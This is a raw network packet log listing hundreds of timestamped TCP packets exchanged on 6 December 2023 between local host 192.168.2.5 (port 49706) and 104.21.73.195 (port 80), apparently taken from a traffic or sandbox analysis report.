                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.600928068 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.600944996 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.600984097 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.601001978 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.601032019 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.601049900 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.601067066 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.601090908 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.601104975 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.601119041 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.601854086 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.601871014 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.601902962 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.601921082 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.601938009 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.601959944 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.601999998 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.602018118 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.602035046 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.602046967 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.602086067 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.602840900 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.602859020 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.602879047 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.602895975 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.602910042 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.602933884 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.602942944 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.602961063 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.602978945 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.603005886 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.603744030 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.603761911 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.603785992 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.603790998 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.603805065 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.603827953 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.603847980 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.603880882 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.603899002 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.603902102 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.603941917 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.604631901 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.604650021 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.604692936 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.604708910 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.604752064 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.604768991 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.604787111 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.604799032 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.604826927 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.604830980 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.605556965 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.605604887 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.605608940 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.605623960 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.605640888 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.605664968 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.605675936 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.605720997 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.605727911 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.605746984 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.605792046 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.606483936 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.606631994 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.606651068 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.606668949 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.606682062 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.606708050 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.606744051 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.606761932 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.606779099 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.606796026 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.606800079 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.606833935 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.607551098 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.607568026 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.607605934 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.607610941 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.607650995 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.607695103 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.607697964 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.607717037 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.607750893 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.607763052 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.608464003 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.608480930 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.608510017 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.608532906 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.608551979 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.608568907 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.608576059 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.608611107 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.608618021 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.608637094 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.608675003 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.609416008 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.609432936 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.609450102 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.609467983 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.609478951 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.609486103 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.609502077 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.609504938 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.609539986 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.609561920 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.610335112 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.610353947 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.610371113 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.610384941 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.610399008 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.610411882 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.610419989 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.610465050 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.610475063 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.610492945 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.610532045 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.611341953 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.611360073 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.611377001 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.611408949 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.611428022 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.611445904 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.611463070 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.611471891 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.611481905 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.611505985 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.612221003 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.612237930 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.612261057 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.612277031 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.612287045 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.612294912 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.612334967 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.612353086 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.612370014 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.612380028 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.612411022 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.613152027 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.613169909 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.613188028 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.613204002 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.613219023 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.613221884 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.613241911 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.613250017 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.613260031 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.613281965 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.614080906 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.614099026 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.614115000 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.614132881 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.614136934 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.614155054 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.614171982 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.614204884 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.614216089 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.614237070 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.614283085 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.614962101 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.614979029 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.614996910 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.615024090 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.615072966 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.615091085 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.615108013 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.615118980 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.615124941 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.615147114 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.615906000 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.615977049 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.616043091 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.616060972 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.616094112 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.616101980 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.616146088 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.616163969 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.616180897 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.616189003 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.616199017 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.616224051 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.616954088 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.616998911 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.617007017 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.617017984 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.617057085 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.617072105 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.617089987 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.617122889 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.617134094 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.617163897 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.617208958 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.617990971 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.618009090 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.618026018 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.618041992 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.618051052 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.618062019 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.618078947 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.618086100 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.618098021 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.618122101 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.618853092 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.618897915 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.618907928 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.618963957 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.618980885 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.618998051 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.619009018 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.619023085 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.619040966 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.619048119 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.619081974 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.619748116 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.619793892 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.619811058 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.619837046 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.619856119 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.619874001 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.619890928 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.619899988 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.619925976 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.619951963 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.620690107 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.620707035 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.620742083 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.620745897 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.620760918 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.620779037 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.620793104 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.620796919 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.620821953 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.620831966 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.620877028 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.621623993 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.621670008 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.621715069 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.621715069 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.621735096 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.621752024 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.621767044 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.621778965 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.621787071 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.621809006 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.622554064 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.622571945 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.622602940 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.622616053 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.622632980 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.622659922 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.622665882 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.622699976 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.622710943 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.622716904 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.622761011 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.623505116 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.623522043 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.623538971 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.623564005 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.623594046 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.623611927 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.623629093 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.623636007 CET4970680192.168.2.5104.21.73.195
